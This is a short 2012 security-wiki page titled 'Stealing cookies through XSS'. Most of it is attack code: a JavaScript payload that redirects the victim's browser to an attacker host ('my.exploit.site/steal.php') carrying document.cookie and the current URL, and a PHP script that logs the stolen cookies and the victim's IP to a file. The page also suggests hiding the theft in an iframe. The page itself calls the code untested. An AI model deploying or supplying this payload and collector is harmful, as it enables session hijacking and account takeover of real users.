Questions about this topic? Sign up to ask in the talk tab.

Cookies/Attacks

From NetSec
Revision as of 06:42, 19 July 2012 by Chantal21I (Talk | contribs) (Created page with "== Stealing cookies through XSS == {{:Cookies/Attacks/Stealing_Cookies_Through_XSS}}")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search

Stealing cookies through XSS

Savitri says
Remember that stealing cookies will make your friends or the grocery shop owner angry!

Change the current page to another location you control, using the document.cookie as parameter. Ideally make it as smooth as possible. Best option is to contaminate an iframe, and to recurse the iframe to its original contents.

<syntaxhighlight lang="javascript"> location.href = "http://my.exploit.site/steal.php?originalURL="+encodeURIComponent(location.href)+"&cookies="+encodeURIComponent(document.cookie); </syntaxhighlight>


steal.php should be something like

<syntaxhighlight lang="php"> <?php /* (c) 2011 BlackHatAcademy */ $data = urldecode($_GET['cookies']); file_put_contents("stolen_cookies.txt", "<IP>".$_SERVER['REMOTE_ADDR']."</IP><![CDATA[".$data."]]>", FILE_APPEND); echo ''; die(); ?> </syntaxhighlight>

Savitri says
This is untested. Feel free to provide a sample implementation or anything more refined.
Retrieved from "http://nets.ec/index.php?title=Cookies/Attacks&oldid=8283"